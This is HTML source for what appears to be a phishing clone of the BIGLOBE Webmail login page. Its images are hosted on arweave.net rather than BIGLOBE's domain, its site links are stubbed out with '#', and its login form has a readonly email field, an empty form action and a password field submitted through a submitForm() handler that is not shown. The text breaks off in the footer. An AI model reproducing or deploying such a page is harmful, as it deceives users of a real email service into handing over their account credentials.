<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Cache-Control" content="no-cache, no-store">
    <meta http-equiv="Expires" content="Thu, 01 Dec 1994 16:00:00 GMT">
    <meta http-equiv="X-UA-Compatible" content="requiresActiveX=true" />
    <meta http-equiv="X-UA-Compatible" content="IE=emulateIE9" />
    <meta name="keywords" content="メール,Webメール,Ｗｅｂメール,BIGLOBE,ビッグローブ" />
    <meta name="description" content="BIGLOBEメールはブラウザで手軽にメールが使えます。スマートフォンにも対応。面倒な設定はいらず、ログインするだけですぐにご利用いただけます。" />
    <meta name="referrer" content="unsafe-url">
    <title>BIGLOBEメール｜Webメール</title>
    <link rel="icon"
        href="https://mnam7yxppn3zhdj53ajdolvh6qarptcw4wl57j4ijcd46pfa7e2q.arweave.net/Y0DP4u97d5ONPdgSNy6n9AEXzFbll9-niEiHzzyg-TU"
        type="image/vnd.microsoft.icon" />
    <!-- SWキーボードここから//-->
    <style>
        @charset "Shift-jis";

        body {
            margin: 0;
            font-size: 80%;
        }

        img {
            padding: 0;
            margin: 0;
            border: 0;
        }

        h1,
        h2,
        h3,
        h4,
        h5,
        p,
        dl,
        dt,
        dd {
            padding: 0;
            margin: 0;
            font-size: 100%;
            font-weight: normal;
        }

        th {
            font-weight: normal;
        }

        span {
            padding: 0;
            margin: 0;
        }

        form {
            margin: 0;
        }

        ul,
        li {
            padding: 0;
            margin: 0;
            list-style: none;
        }

        a,
        a:link,
        a:visited {
            color: #2674f3;
            text-decoration: underline;
        }

        a:hover,
        a:active {
            color: #c30;
            text-decoration: underline;
        }
    </style>
    <style>
        @charset "Shift-jis";

        #contents_block {
            float: left;
            width: 550px;
            padding: 0 15px;
        }

        #contents_block .pr_block {
            width: 550px;
            height: 165px;
            margin: 15px 0 0;
            background: url(https://webmail.biglobe.ne.jp/images2/goodpoint.gif) no-repeat;
        }

        #contents_block .pr_block .sv_link {
            padding: 140px 15px 0;
            text-align: right;
            vertical-align: top;
            line-height: 120%;
        }

        #contents_block .pr_block .sv_block {
            padding: 0 15px 10px;
        }

        #contents_block .pr_block .sv_block_last {
            padding: 0 15px 0;
        }

        #contents_block .pr_block .sv_img {
            float: left;
            width: 120px;
        }

        #contents_block .pr_block .sv_txt {
            float: left;
            padding-left: 15px;
            width: 385px;
        }

        #contents_block .infotitle {
            color: #3399CC;
            font-size: 1.1em;
            font-weight: bold;
            margin: 0;
            padding-left: 10px;
            padding-bottom: 10px;
        }

        #contents_block .infoArea {
            padding-left: 10px;
        }

        #contents_block .infoArea p {
            padding-bottom: 5px;
        }

        #contents_block .news {
            margin: 0 0 0px;
            line-height: 60%;
        }

        #contents_block .news ul {
            width: 550px;
            margin: 0 0 0px;
        }

        #contents_block .subArea_block {
            width: 550px;
            margin: 20px 0 0;
        }

        #contents_block .subArea_block ul.textArea {
            width: 520px;
            background-color: #FFF;
            border-top: none;
            padding: 12px 15px 0;
        }

        #contents_block .subArea_block ul.textArea li {
            background: url(https://webmail.biglobe.ne.jp/images2/icon_list.gif) 0 7px no-repeat;
            padding: 0 0 5px 12px;
        }

        #contents_block .subArea_block ul.textArea li.dot {
            border-bottom: #CCC 1px dotted;
            margin-bottom: 5px;
        }

        #contents_block .subArea_block ul.textArea li.dot_last {
            border-bottom: none;
            margin-bottom: 0;
        }

        #contents_block .subArea_block .w8_block {
            background-image: url("https://webmail.biglobe.ne.jp/images2/win8image.gif");
            background-position: 420px 10px;
            background-repeat: no-repeat;
            border: 1px solid #FF0000;
            color: #FF0000;
            font-size: 90%;
            margin: 10px 0 10px 10px;
            padding: 10px 0 7px 7px;
            width: 520px;
            height: 80px;
            line-height: 1.5;
        }

        #contents_block .subArea_block .w8cpt {
            font-size: 88%;
            color: #333333;
            padding-left: 410px;
            padding-top: 9px;
            margin-right: 10px;
            line-height: 1;
        }

        .iframe_contents {
            margin: 0px;
            margin-width: 0;
            margin-height: 0;
            width: 580px;
            height: 700px;
            float: left;
        }

        .webrylink {
            margin-top: 5px;
        }

        .webrylink ul li {
            background: url(https://webmail.biglobe.ne.jp/images2/icon_link.gif) 0 0px no-repeat;
            padding: 2px 10px 7px 20px;
            float: left;
        }

        .webrylink .banner_area {
            height: 150px;
        }

        #side_menuArea {
            float: right;
            width: 260px;
            padding: 0 15px 0 0;
        }

        #side_menu_block {
            width: 260px;
            padding: 0;
        }

        #side_menu {
            width: 260px;
            padding: 0 0 20px;
        }

        #side_menu .login_block {
            width: 238px;
            margin: 0 0 0 10px;
            background: #ffffcc;
            padding: 10px 0 15px;
            border: #CDCCCC 1px solid;
        }

        #side_menu .login_block form {
            width: 208px;
            margin: 0 auto;
        }

        #side_menu .login_block form div label {
            display: block;
            margin-bottom: 2px;
            font-size: 115%;
            font-weight: bold;
        }

        #side_menu .login_block form #ai {
            width: 205px;
            margin-bottom: 5px;
            font-size: 130%;
            height: 1.4em;
            line-height: 1.4em;
        }

        #side_menu .login_block form #pr {
            width: 205px;
            margin-bottom: 0;
            font-size: 130%;
            height: 1.4em;
            line-height: 1.4em;
        }
        }

        #side_menu .login_block form ul {
            padding: 10px 0 0 0;
        }

        #side_menu .login_block form ul li {
            margin: 0 0 0 5px;
            padding: 0;
        }

        #side_menu .login_block form div.loginBtn {
            padding-top: 15px;
        }

        #side_menu .login_block ul.supportLink,
        #side_menu .login_block ul.basicLink {
            margin: 15px 15px 0;
            padding: 10px 0 0;
            border-top: #CDCCCC 1px solid;
        }

        #side_menu .login_block ul.supportLink li {
            margin: 0 0 5px 0;
            padding: 0 0 0 20px;
            background: url(https://webmail.biglobe.ne.jp/images2/icon_question.gif) 0 2px no-repeat;
        }

        #side_menu .login_block ul.basicLink li {
            margin: 0 0 5px;
            padding: 0 0 0 20px;
            background: url("https://webmail.biglobe.ne.jp/images2/icon_arrow.gif") 0 2px no-repeat;
            vertical-align: top;
        }

        #side_menu .login_block ul.basicLink li.last {
            margin: 0;
        }

        #side_menu div.beginnerLink {}

        #side_menu ul.links li.last {
            padding: 0 0 0px 20px;
        }

        #side_menu div.biginnerLink {
            margin: 15px 15px 0;
            padding: 10px 0 10px 10px;
            border-bottom: #CCC 1px dotted;
        }

        #side_menu div.biginnerLink p {
            margin: 0;
            padding: 0 0 0 20px;
            background: url("../images2/icon_arrow.gif") 0 2px no-repeat;
            float: left;
        }

        #side_menu div.biginnerLink img {
            float: left;
            padding: 0 0 0 2px;
        }

        #side_menu .otherLink {
            margin: 0 15px 0;
            padding: 10px 0 0 10px;
        }

        #side_menu ul.otherLink li {
            margin: 0 0 10px;
            padding: 0 0 0 20px;
            background: url("../images2/icon_arrow.gif") 0 2px no-repeat;
        }

        #side_menuArea .verisign {
            margin: 10px 0 0 15px;
            padding: 0;
        }

        #side_menuArea img {
            margin-left: 0px;
        }

        img {
            border: 0 none;
            margin: 0;
            padding: 0;
        }

        #topMidbanner {
            width: 520px;
            margin: 10px 0 15px 10px;
        }

        #topMidbanner div.service1 {
            float: left;
            width: 265px;
        }

        #info_footer {
            position: absolute;
            font-size: 90%;
            top: 379px;
        }

        #info_footer p li {
            float: left;
        }
    </style>
    <style>
        @charset "Shift-jis";

        #keyboard p {
            margin: 0;
            padding: 0;
            font-size: 0.9em;
        }

        #keyboard a {
            font-size: 0.9em;
        }

        #soft_keyboard_layout_box {
            margin-top: 2px;
            margin-bottom: 10px;
        }

        soft_keyboard_id_select {
            margin-top: 8px;
            display: block;
        }

        #soft_keyboard_title {
            padding: 6px 4px 0;
            font-size: 14px;
            font-weight: bold;
        }

        .soft_keyboard_title_bg {
            text-align: center;
            width: 382px;
            height: 32px;
            border-left: 1px #bfbfbf solid;
            border-right: 1px #bfbfbf solid;
            background: url(https://webmail.biglobe.ne.jp/softkeyboard/img/title_bg.gif) repeat-x;
            float: left;
        }

        .soft_keyboard_close_overlay {
            width: 28px;
            height: 32px;
            float: right;
            text-align: right;
        }

        .soft_keyboard_in {
            padding-top: 10px;
        }

        #soft_keyboard_in_tmp {
            font-size: 120%;
        }

        #soft_keyboard_in_tmp2 {
            font-size: 90%;
        }

        #ta {
            margin-top: 10px;
            width: 350px;
            height: 20px;
            border: #a5acb2 1px solid;
            font-weight: normal;
        }

        .num_box {
            margin: 4px 0px 0;
            padding: 3px 4px 1px 7px;
            border: #e5e5e5 1px solid;
            background-color: #f2f2f2;
        }

        * html .num_box {
            padding: 3px 0 1px 7px;
        }

        .keyBox {
            margin: 0 0 2px 0;
            padding: 0;
        }

        .del_box {
            margin: 4px auto 0;
            padding: 0px;
            width: 280px;
            text-align: center;
        }

        .select_box {
            margin-top: 0px;
            padding: 10px 0 0 0;
            text-align: center;
        }

        .checkbox {
            margin: 0px 0 0 8px;
            padding: 0;
            text-align: left;
            font-size: 0.9em;
        }

        input#ok {
            margin-right: 20px;
            width: 96px;
            height: 32px;
        }

        input#next {
            width: 96px;
            height: 32px;
        }

        input#cancel {
            width: 96px;
            height: 32px;
        }

        input.highlight_style {
            background: #ffffcc;
        }

        .margin_bottom5 {
            margin-bottom: 5px;
        }

        .clearfix:after {
            content: "";
            display: block;
            clear: both;
        }

        .clearfix {
            display: inline-block;
        }

        * html .clearfix {
            height: 1%;
        }

        .clearfix {
            display: block;
        }

        #soft_keyboard_num_0,
        #soft_keyboard_num_1,
        #soft_keyboard_num_2,
        #soft_keyboard_num_3,
        #soft_keyboard_num_4,
        #soft_keyboard_num_5,
        #soft_keyboard_num_6,
        #soft_keyboard_num_7,
        #soft_keyboard_num_8,
        #soft_keyboard_num_9,
        #soft_keyboard_large_0,
        #soft_keyboard_large_1,
        #soft_keyboard_large_2,
        #soft_keyboard_large_3,
        #soft_keyboard_large_4,
        #soft_keyboard_large_5,
        #soft_keyboard_large_6,
        #soft_keyboard_large_7,
        #soft_keyboard_large_8,
        #soft_keyboard_large_9,
        #soft_keyboard_large_10,
        #soft_keyboard_large_11,
        #soft_keyboard_large_12,
        #soft_keyboard_large_13,
        #soft_keyboard_small_0,
        #soft_keyboard_small_1,
        #soft_keyboard_small_2,
        #soft_keyboard_small_3,
        #soft_keyboard_small_4,
        #soft_keyboard_small_5,
        #soft_keyboard_small_6,
        #soft_keyboard_small_7,
        #soft_keyboard_small_8,
        #soft_keyboard_small_9,
        #soft_keyboard_small_10,
        #soft_keyboard_small_11,
        #soft_keyboard_small_12,
        #soft_keyboard_small_13,
        #soft_keyboard_large_14,
        #soft_keyboard_large_15,
        #soft_keyboard_large_16,
        #soft_keyboard_large_17,
        #soft_keyboard_large_18,
        #soft_keyboard_large_19,
        #soft_keyboard_large_20,
        #soft_keyboard_large_21,
        #soft_keyboard_large_22,
        #soft_keyboard_large_23,
        #soft_keyboard_large_24,
        #soft_keyboard_large_25,
        #soft_keyboard_small_14,
        #soft_keyboard_small_15,
        #soft_keyboard_small_16,
        #soft_keyboard_small_17,
        #soft_keyboard_small_18,
        #soft_keyboard_small_19,
        #soft_keyboard_small_20,
        #soft_keyboard_small_21,
        #soft_keyboard_small_22,
        #soft_keyboard_small_23,
        #soft_keyboard_small_24,
        #soft_keyboard_small_25,
        #soft_keyboard_mail_mark_0,
        #soft_keyboard_mail_mark_1,
        #soft_keyboard_mail_mark_2,
        #soft_keyboard_mail_mark_3,
        #soft_keyboard_mail_mark_4,
        #soft_keyboard_mail_mark_5,
        #soft_keyboard_mail_mark_6,
        #soft_keyboard_mail_mark_7,
        #soft_keyboard_mail_mark_8,
        #soft_keyboard_mail_mark_9,
        #soft_keyboard_mail_mark_10,
        #soft_keyboard_mail_mark_11,
        #soft_keyboard_mail_mark_12,
        #soft_keyboard_mail_mark_13,
        #soft_keyboard_mail_mark_14,
        #soft_keyboard_mail_mark_15,
        #soft_keyboard_mail_mark_16,
        #soft_keyboard_mail_mark_17,
        #soft_keyboard_mail_mark_18,
        #soft_keyboard_mail_mark_19,
        #soft_keyboard_mail_mark_20,
        #soft_keyboard_mail_mark_21,
        #soft_keyboard_mail_mark_22,
        #soft_keyboard_mail_mark_23,
        #soft_keyboard_mail_mark_24,
        #soft_keyboard_mail_mark_25,
        #soft_keyboard_mail_mark_26,
        #soft_keyboard_mail_mark_27,
        #soft_keyboard_pass_mark_0,
        #soft_keyboard_pass_mark_1,
        #soft_keyboard_pass_mark_2,
        #soft_keyboard_pass_mark_3,
        #soft_keyboard_pass_mark_4,
        #soft_keyboard_pass_mark_5,
        #soft_keyboard_pass_mark_6,
        #soft_keyboard_pass_mark_7,
        #soft_keyboard_pass_mark_8,
        #soft_keyboard_pass_mark_9,
        #soft_keyboard_pass_mark_10,
        #soft_keyboard_pass_mark_11,
        #soft_keyboard_pass_mark_12,
        #soft_keyboard_pass_mark_13,
        #soft_keyboard_pass_mark_14,
        #soft_keyboard_pass_mark_15,
        #soft_keyboard_pass_mark_16,
        #soft_keyboard_pass_mark_17,
        #soft_keyboard_pass_mark_18,
        #soft_keyboard_pass_mark_19,
        #soft_keyboard_pass_mark_20,
        #soft_keyboard_pass_mark_21,
        #soft_keyboard_pass_mark_22,
        #soft_keyboard_pass_mark_23,
        #soft_keyboard_pass_mark_24,
        #soft_keyboard_pass_mark_25,
        #soft_keyboard_pass_mark_26,
        #soft_keyboard_pass_mark_27 {
            display: block;
            width: 25px;
            height: 25px;
            margin: 0;
            margin-right: 3px;
            padding: 0;
            border: 0;
            text-indent: -9898px;
            font-size: 0px;
            line-height: 0px;
            cursor: pointer;
            float: left;
            background: url(https://webmail.biglobe.ne.jp/softkeyboard/img/keytop_all.gif) no-repeat left top;
        }

        #soft_keyboard_add_0,
        #soft_keyboard_add_1,
        #soft_keyboard_add_2,
        #soft_keyboard_add_3 {
            display: block;
            height: 25px;
            margin: 0;
            margin-right: 3px;
            padding: 0;
            border: 0;
            text-indent: -9898px;
            font-size: 0px;
            line-height: 0px;
            cursor: pointer;
            float: left;
            background: url(https://webmail.biglobe.ne.jp/softkeyboard/img/keytop_all.gif) no-repeat left top;
        }

        #soft_keyboard_add_0,
        #soft_keyboard_add_1,
        #soft_keyboard_add_2 {
            width: 48px;
        }

        #soft_keyboard_add_3 {
            width: 96px;
        }

        #soft_keyboard_backspace,
        #soft_keyboard_clear {
            display: block;
            width: 63px;
            height: 25px;
            margin: 0;
            padding: 0;
            border: 0;
            text-indent: -9898px;
            font-size: 0px;
            line-height: 0px;
            cursor: pointer;
            background: url(https://webmail.biglobe.ne.jp/softkeyboard/img/keytop_all.gif) no-repeat left top;
        }

        #soft_keyboard_backspace {
            float: right;
            margin: 0;
        }

        #soft_keyboard_clear {
            float: right;
            margin: 0 0 0 4px;
        }

        #soft_keyboard_right,
        #soft_keyboard_left {
            display: block;
            width: 16px;
            height: 25px;
            padding: 0;
            border: 0;
            text-indent: -9898px;
            font-size: 0px;
            line-height: 0px;
            cursor: pointer;
            background: url(https://webmail.biglobe.ne.jp/softkeyboard/img/keytop_all.gif) no-repeat left top;
        }

        #soft_keyboard_right {
            float: left;
            margin: 0 0 0 0;
        }

        #soft_keyboard_left {
            float: left;
            margin: 0 2px 0 0;
        }

        .soft_keyboard_space {
            display: block;
            width: 8px;
            height: 25px;
            margin: 0;
            padding: 0;
            border: 0;
            text-indent: -9898px;
            font-size: 0px;
            line-height: 0px;
            float: left;
        }

        #over_ct {
            background: url(https://webmail.biglobe.ne.jp/softkeyboard/img/over_ct.gif) left top repeat-x;
            border: none;
            padding: 0;
        }

        #over_lc {
            background: url(https://webmail.biglobe.ne.jp/softkeyboard/img/over_lc.gif) left top repeat-y;
            border: none;
            padding: 0;
        }

        #over_rc {
            background: url(https://webmail.biglobe.ne.jp/softkeyboard/img/over_rc.gif) right top repeat-y;
            border: none;
            padding: 0;
        }

        #over_cb {
            background: url(https://webmail.biglobe.ne.jp/softkeyboard/img/over_cb.gif) left top repeat-x;
            border: none;
            padding: 0;
        }
    </style>
    <style>
        @charset "Shift-jis";

        body {
            background: url(https://lmn4z5q3jrnv4xkssqto235eednw6r5srqxyaynlhxoesoznxl2q.arweave.net/WxvM9htMW15dUpQm7W-kINtvR7KML4Bhqz3cSTstuvU) repeat-y center #f6f6f6;
        }

        #container {
            width: 860px;
            margin: 0 auto;
            background: #FFFFFF;
        }

        #main {
            width: 860px;
            line-height: 1.4em;
            margin: 10px auto 0 auto;
        }

        .warning {
            border: solid 1px #FDE5E5;
            background-color: #FFF5F5;
            padding: 10px;
            margin: 0 0 20px;
            color: #FF0000;
        }

        .attention-red {
            color: #FF0000;
        }

        br.clear {
            clear: both;
            height: 0;
        }

        div.clear {
            clear: both;
            height: 0;
            line-height: 0;
        }

        .linkSet {
            background: url(https://7j67ajurnlxwkbv7fkfzvo5dxfxyzxfjfxvjrhjnic4tkrhbzgpq.arweave.net/-n3wJpFq72UGvyqLmrujuW-M3Kkt6pidLUC5NUThyZ8) 0 2px no-repeat;
            padding: 0 0 0 20px;
        }
    </style>
    <style>
        @charset "Shift_JIS";

        div#footerContainer {
            clear: both;
            width: 860px;
            display: block;
            background: #FFFFFF;
        }

        div#footerPagetop {
            width: 860px;
            padding-top: 16px;
            padding-bottom: 10px;
            text-align: right;
            display: block;
        }

        div#layout-footer-nobg #footerPagetop {
            background: none;
        }

        div#footerPagetop a {
            margin-right: 6px;
        }

        div#footerSearch {
            width: 860px;
            background-color: #f0f0f0;
            border-top: 1px solid #8c9bca;
            padding-top: 10px;
            padding-bottom: 10px;
            text-align: center;
            line-height: 1.5em;
        }

        div#footerRecommend {
            width: 860px;
            padding-top: 10px;
            padding-bottom: 10px;
            text-align: center;
            border-top: 1px dotted #8c9bca;
        }

        div#footerLink {
            width: 860px;
            border-top: 1px solid #8c9bca;
            padding-top: 10px;
        }

        div#footerLinkBox1 {
            width: 10px;
            float: left;
        }

        div#footerLinkBox2 {
            width: 630px;
            float: left;
            text-align: center;
            line-height: 1.3em;
            font-size: 0.7rem;
        }

        div#footerLinkBox3 {
            text-align: right;
            width: 210px;
            padding-right: 10px;
            float: right;
        }

        div#footerLinkBox3 .icon {
            padding-right: 8px;
        }

        div#footerCopyright {
            clear: both;
            width: 860px;
            padding-top: 10px;
            text-align: center;
        }

        div#footer {
            border-top: 1px solid #8c9bca;
            padding: 0 0 0 5px;
            font-size: 12px;
            clear: both;
        }

        div#footer div.footer1 {
            float: left;
        }

        div#footer div.footer2 {
            float: right;
            margin: 8px 0;
            white-space: nowrap;
            font-size: 110%;
        }

        div#footer div.footer3 {
            margin: 0;
            float: right;
        }
    </style>
    <style>
        @charset "Shift_JIS";

        #header_main {
            background: #FFFFFF;
            width: 860px;
            margin: 0;
            padding: 0;
        }

        #header_logo {
            width: 233px;
            margin: 0;
            padding: 12px 0 0 15px;
            float: left;
            height: 39px;
        }

        #header_keyword {
            float: right;
            width: 250px;
            text-align: left;
            padding: 20px 0 0 0;
        }

        #header_keyword strong {
            font-weight: normal;
        }

        #headerNavi {
            width: 370px;
            padding: 15px 8px 0 0;
            margin: 0;
            float: right;
            text-align: right;
        }

        #headerNavi form {
            margin: 0;
            padding: 0;
        }

        #headerNavi form input {
            margin: 0;
            padding: 0 6px;
        }

        #headerNavi div.search {
            float: right;
        }

        #headerNavi div.top {
            float: right;
            padding: 4px 7px 0 0;
        }

        #header-link {
            background: #ccc url(https://nsquigyr55opin43f7sbhvdobq4bqzq5www3yu27ae2xfiqlnpla.arweave.net/bKFEGxHvXPQ3my_kE9RuDDgYZh21rbxTXwE1cqILa9Y) no-repeat bottom;
            width: 860px;
            height: 26px;
            margin: 0;
            padding: 0;
            border-bottom: 1px solid #ccc;
        }

        #header-link #support-menu {
            width: 860px;
            margin: 0;
            padding: 0;
        }

        #header-link #support_menu ul {
            float: right;
            padding: 2px 0 0 0;
        }

        #header-link #support_menu li {
            margin: 0;
            float: left;
        }

        #header-link #support_menu li a {
            padding: 3px 8px 0 15px;
            white-space: nowrap;
            display: block;
        }

        #header-link #support_menu li a,
        #header-link #support_menu li a:link,
        #header-link #support_menu li a:visited {
            background: url(https://fafzjupe2ccpxahnxk3h3y4qsnnfepkpifk3f6egbjmvg3lweikq.arweave.net/KAuU0eTQhPuA7bq2feOQk1pSPU9BVbL4hgpZU212IhU) no-repeat 0px 5px;
        }

        #header-link #support_menu li a:active,
        #header-link #support_menu li a:hover {
            background: url(https://et5obu5v2sttjmg3iufzzsqi7dixij4e7fr2bwrlgopqbteag7ya.arweave.net/JPrg07XUpzSw20ULnMoI-NF0J4T5Y6DaKzOfAMyAN_A) no-repeat 0px 5px;
        }

        #header-link #support_menu li a.bl,
        #header-link #support_menu li a.bl:link,
        #header-link #support_menu li a.bl:visited {
            background: url(https://ngcyb2yfhu56ej27haxxrldtjnlpygtsj4wlof3pcz4vs4wykzpa.arweave.net/aYWA6wU9O-InXzgveKxzS1b8GnJPLLcXbxZ5WXLYVl4) no-repeat 0px 5px;
        }

        #header-link #support_menu li a.bl:active,
        #header-link #support_menu li a.bl:hover {
            background: url(https://ewcduwo6trmkls2qjewjaneh3nzowubdo3kfyi66uxelowbwjixa.arweave.net/JYQ6Wd6cWKXLUEkskDSH23LrUCN21Fwj3qXIt1g2Si4) no-repeat 0px 5px;
        }
    </style>
    <style>

    </style>
</head>

<body onload="deprecated_check()">

    <div style="position: sticky; top: 0; background-color: #f1f1f1;  z-index: 999;">
        <div id="google_translate_element"></div>
    </div>

    <div id="container"><a name="pagetop"></a>

        <!-- Header// -->
        <div id="header_main">
            <div id="header_logo">
                <h1><img src="https://e4sbqrp5tk4ynwomrsrprxv7o5hr6ca3fzmvq542s7c3ngvxe55q.arweave.net/JyQYRf2auYbZzIyi-N6_d08fCBsuWVh3mpfFtpq3J3s"
                        alt="BIGLOBEメール" usemap="#logo" width="210" height="31" /></h1>
                <map name="logo">
                    <area shape="rect" coords="0,0,150,35" href="#" alt="BIGLOBE" />
                    <area shape="rect" coords="150,0,210,35" href="#" alt="BIGLOBEメール" />
                </map>
            </div><!--/header-logo-->
            <div id="header_keyword">
                <strong>メールがもっと便利で楽しくなる！</strong>
            </div><!--/header_keyword-->
            <!--
	<div id="headerNavi">
	<div class="search">
<form method="get" action="http://guide.biglobe.ne.jp/cgi-bin/search-roboBS" name="search">
<input type="text" name="q" size="18" style="width:125px;color:#999" value="キーワード" onFocus="javascript:if(this.value=='キーワード')
							this.value='';this.style.color='#333'" onBlur="javascript:if(this.value=='')this.value='キーワード';this.style.color='#999'" />
<input type="submit" value="サイト内検索" />
<input type="hidden" name="c" value="検索" />
<input type="hidden" name="clid" value="1" />
<input type="hidden" name="sitesearch" value="webmail.biglobe.ne.jp" />
</form>
	</div>
	<div class="top"><a href="http://www.biglobe.ne.jp/">BIGLOBEトップ</a></div>
	</div>
-->
            <br class="clear" />
        </div>

        <div id="header-link">
            <div id="support_menu">
                <ul class="fmenu">
                    <li><a href="#">メールサービス</a></li>
                    <li><a class="bl" href="#">会員サポート</a></li>
                    <li><a class="bl" href="#">障害情報</a></li>
                </ul>
            </div>
        </div>
        <!-- //Header -->


        <!-- Main_start -->
        <div id="main">

            <!-- Contents_start -->
            <div id="contents_block">

                <!-- 注意書きの記載 //-->
                <!-- JavaScriptが動作しない場合 //-->
                <noscript>
                    <div class="warning">
                        BIGLOBEメール（アドバンスト版）をご利用になるには、JavaScriptを有効にしてください。
                    </div>
                </noscript>

                <!-- 注意書きの記載 //-->
                <!--★ここから追記4/20★-->
                <div class="news">
                    <ul>


                    </ul>
                </div>
                <!--★ここまで追記4/20★-->

                <!--div class="pr_block">
</div -->

                <!-- 障害情報 start //-->
                <!--
<div class="infoArea">
<p><img src="https://asp2.blog.biglobe.ne.jp/images/manage/emoji/webry/07_attention.gif">
<a href="https://support.biglobe.ne.jp/shogaiap/today.html#100010358" target="_blank"><font color="ff0000"><b>【一部のお客さま】Webメールへのアクセスに時間がかかる事象のお詫び(2018/7/17)</a></b></font></p>
</div>
-->
                <!-- 障害情報 end //-->

                <!-- お客様サービス start //-->
                <!-- お客様サービス end //-->

                <!-- お知らせ start //-->
                <div class="infotitle" style="margin-top:25px;">お知らせ</div>
                <div class="infoArea">
                    <p>・<a href="#">BIGLOBEメール 一部仕様変更のお知らせ</a>
                        <font color="ff0000"><b>New!</b></font>
                    </p>
                    <p>・<a href="#">Webメールにログインが出来ない場合はこちらをご確認ください。</a>
                        <font color="ff0000"><b></b></font>
                    </p>
                </div>
                <!-- お知らせ end //-->

                <script>
                    getResponsiveCSS();
                </script>
                <!-- div class="subArea_block">
<h3><img src="https://webmail.biglobe.ne.jp/images2/title_top_attention.jpg" alt="ご注意ください" width="550" height="20" /></h3>

<ul class="textArea">
<li class="dot_last">
パスワードは、第三者に悪用されないためにも、定期的に変更することをおすすめします。<br />
［<a href="http://support.biglobe.ne.jp/jimu/idpw/pwchange/pass.html" target="blank">より安全なパスワードにするには</a>］
</li>
</ul>
</div --><!-- /subArea_block -->

                <div id="info_footer">
                    <p>


                    <div class="webrylink">
                        <center>

                            <div class="banner_area" style="margin-bottom: 15px;">
                            </div>
                            <ul>
                                <li><a href="#">推奨環境</a></li>
                                <li><a href="#">ヘルプ</a></li>
                                <li><a href="#">よくあるお問い合わせ</a></li>
                                <li><a href="#">必ずお読みください</a></li>
                            </ul>
                        </center>
                    </div>

                    </p>
                </div>

                <!-- /contents_block -->
            </div>
            <!-- Contents_end -->


            <!-- Menu_start -->
            <div id="side_menuArea">
                <div id="side_menu_block">
                    <div id="side_menu">
                        <h2><img src="https://dpkcsutlbrj2lmobvdcfiowayv5fuar5ls2mzuvoil55chw76vmq.arweave.net/G9QpUmsMU6WxwajEVDrAxXpaAj1ctMzSrkL70R7f9Vk"
                                alt="BIGLOBEメールメールにログイン" width="238" height="43" /></h2>

                        <!-- ERRORメッセージ:s -->
                        <div id="msg"
                            style="background-color: #ffffff; color:red; margin: 10px 0 10px; padding: 10px !important; padding-bottom: 0; border: 2px solid #d5d5d5; text-align: left; display:block;display: none;">
                            メールアドレス(ユーザID)またはBIGLOBEパスワードが正しくありません。</div>
                        <div id="error"
                            style="background-color: #ffffff; color:red; margin: 10px 0 10px; padding: 10px !important; padding-bottom: 0; border: 2px solid #d5d5d5; text-align: left; display:block;display: none;">
                            メールアドレス(ユーザID)またはBIGLOBEパスワードが正しくありません。</div>
                        <!-- ERRORメッセージ:e -->

                        <div class="login_block">
                            <div id="login_form">
                                <form id="" name="form1" data-name="" action="" method="post" required>

                                    <div>
                                        <label for="loginid">メールアドレスまたはユーザID</label>
                                        <input name="ai" type="text" size="35" autocomplete="off" id="ai" value=""
                                            readonly style="ime-mode: disabled" />
                                        <label for="biglobe_pw">BIGLOBEパスワード</label>
                                        <input name="pr" type="password" size="30" id="pr" />
                                    </div>

                                    <!-- Androidの場合SWキーボードのボタンを表示しないここから //-->

                                    <!-- Androidの場合SWキーボードのボタンを表示しないここまで //-->

                                    <!-- SWキーボードここから //-->
                                    <div id="keyboard"></div>
                                    <div id="my_div"></div>

                                    <!-- SWキーボードここまで //-->

                                    <ul>
                                        <li><input type="checkbox" name="autologinidflag" id="autologinidflag"
                                                value="1" /><label for="autologinidflag">次回からIDの入力を省略</label></li>
                                        <li><input type="checkbox" name="autologinflag" id="autologinflag"
                                                value="1" /><label for="autologinflag"><a
                                                    href="#">ログイン状態を保存する</a><br />（共有パソコンではチェックをはずしてください）</label></li>
                                        <li><SELECT name="version" id="version" onChange="deprecated_check()"
                                                style="display:none;">
                                                <OPTION value="advanced" selected>アドバンスト版</OPTION>
                                                <OPTION value="basic">標準版</OPTION>
                                            </SELECT></li>
                                        <li>

                                            <div id='deprecated' style="padding-top: 10px">
                                            </div>

                                        </li>
                                    </ul>

                                    <div class="loginBtn">
                                        <input type="image"
                                            src="https://d22jhzoamttbzp445pilvtq3haipwashc2bcptejxb2jhtfp325a.arweave.net/HrST5cBk5hy_nOvQus4bOBD7AkcWgifMibh0k8yv3ro"
                                            border="0" alt="ログイン" title="ログイン" width="205" height="37" id="submit-btn"
                                            onclick="submitForm(event)" />
                                    </div>

                                </form>

                            </div><!-- //login_form -->

                            <ul class="supportLink">
                                <li><a href="#">ログイン方法について</a></li>
                                <li><a href="#">ID・パスワードを忘れた場合</a><br />
                                    BIGLOBE法人会員でID・パスワードをお忘れの方は［<a href="#">こちら</a>］</li>
                                <li><a href="#">メールアドレスの取得・確認</a></li>
                                <li><a href="#">メールアドレスの変更</a></li>
                            </ul>
                        </div><!-- /login_block -->


                        <!-- /side_menu -->
                    </div>
                    <!-- /side_menu_block -->
                </div>

            </div><!-- //side_menuArea -->
            <!-- /Menu_end -->

        </div><!-- /main -->
        <!-- /Main_end -->

        <!-- START : フッター -->
        <div id="footerContainer">
            <!--フッターサーチここから-->
            <!--
<div id="footerSearch">
<table border="0" align="center" cellpadding="0" cellspacing="0" summary="search form">
<tr>
	<form name="srh2" id="srh2" method="get" action="http://cgi.search.biglobe.ne.jp/cgi-bin/search2-f">
	<td>
		<input type="hidden" name="search" value="検索">
		<input type="text" name="q" size="18" style="width:216px" value="">
	</td>
	<td width="3"><img src="https://webmail.biglobe.ne.jp/images2/common/spacer.gif" alt="" width="3" height="3"></td>
	<td><input type="submit" name="btn2" value="ウェブ検索"></td>
	</form>
</tr>
</table>
</div>
-->
            <!--フッターサーチここまで-->
            <div id="footerLink">
                <div id="footerLinkBox1">&nbsp;</div>
                <div id="footerLinkBox2">
                    <a href="#">BIGLOBEトップ</a>｜<a href="#">インターネット接続</a>（<a href="#">ビッグローブ光</a>・<a
                        href="#">格安SIM</a>・<a href="#">SIM替え</a>）<br>
